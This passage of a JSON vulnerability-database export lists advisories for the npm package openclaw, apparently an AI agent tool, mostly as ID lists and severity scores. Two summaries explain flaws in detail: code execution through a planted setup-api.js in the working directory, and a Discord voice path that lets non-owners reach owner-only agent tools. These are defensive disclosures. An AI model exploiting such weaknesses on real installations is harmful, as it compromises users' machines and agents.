fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np
82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tg
t5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-vm29-7mq3-9jrg"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dsvn-dpb5-tfdz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94834?format=json","vulnerability_id":"VCID-dv5s-pvw1-a7fu","summary":"OpenClaw vulnerable to arbitrary code execution via attacker-controlled setup-api.js loaded from cwd during env-key resolution\n## Summary\n\nOpenClaw's bundled plugin setup resolver could fall back to `process.cwd()` while resolving provider setup metadata. If a user ran an OpenClaw command from an attacker-controlled repository containing `extensions/<plugin>/setup-api.js`, OpenClaw could load and execute that JavaScript during ordinary provider/model status resolution.\n\n## Impact\n\nThis is arbitrary JavaScript execution in the OpenClaw process under the current user account. A malicious repository could run code when the user executed commands such as provider/model inspection from that directory. The issue does not require gateway network exposure, but it does require user interaction: the user must run OpenClaw from a directory containing the attacker-controlled setup file.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nOpenClaw now resolves bundled setup fallbacks only from the canonical package/repository root and no longer includes `process.cwd()` as a trusted setup-api search root. 
A regression test verifies that a workspace-local `extensions/<plugin>/setup-api.js` is not loaded through provider setup resolution.\n\n## Fix Commit(s)\n\n- `993781e6e6eaf50f033cfc3e3bf4f47059740707` (`fix(plugins): ignore cwd setup-api fallback`)\n\n## Severity\n\nSeverity remains `high` because successful exploitation allows arbitrary code execution under the user running OpenClaw. The CVSS vector is local/user-interaction scoped rather than network-only because the victim must run OpenClaw from an attacker-controlled directory.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45004","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0286","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02815","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02869","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45004"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/993781e6e6eaf50f033cfc3e3bf4f47059740707","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/"}],"url":"htt
ps://github.com/openclaw/openclaw/commit/993781e6e6eaf50f033cfc3e3bf4f47059740707"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r39h-4c2p-3jxp","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r39h-4c2p-3jxp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45004","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45004"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-setup-api-js-in-current-working-directory","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-setup-api-js-in-current-working-directory"},{"reference_url":"https://github.com/advisories/GHSA-r39h-4c2p-3jxp","reference_id":"
GHSA-r39h-4c2p-3jxp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r39h-4c2p-3jxp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114733?format=json","purl":"pkg:npm/openclaw@2026.4.23","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.23"}],"aliases":["CVE-2026-45004","GHSA-r39h-4c2p-3jxp"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dv5s-pvw1-a7fu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50595?format=json","vulnerability_id":"VCID-dzmz-c5en-5qeq","summary":"OpenClaw: Discord voice transcript owner-flag omission could expose owner-only tools in mixed-trust channels\nIn `openclaw@2026.3.1`, the Discord voice transcript path called `agentCommand(...)` without `senderIsOwner`, and `agentCommand` defaults missing `senderIsOwner` to `true`.\n\nThis could allow a non-owner voice participant in the same channel to reach owner-only tool surfaces (`gateway`, `cron`) during voice transcript 
turns.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32035","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12467","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12504","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12502","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32035"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-owner-flag-validation-in-discord-voice-transcript-handler","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:54:53Z/"}],"url":"https://www.vulncheck.com/
advisories/openclaw-missing-owner-flag-validation-in-discord-voice-transcript-handler"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32035","reference_id":"CVE-2026-32035","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32035"},{"reference_url":"https://github.com/advisories/GHSA-wpg9-4g4v-f9rc","reference_id":"GHSA-wpg9-4g4v-f9rc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wpg9-4g4v-f9rc"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wpg9-4g4v-f9rc","reference_id":"GHSA-wpg9-4g4v-f9rc","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:54:53Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wpg9-4g4v-f9rc"}],"fixed_packages":[{"url":"http:
//public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerabili
ty":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerabili
ty":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerabili
ty":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerabili
ty":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss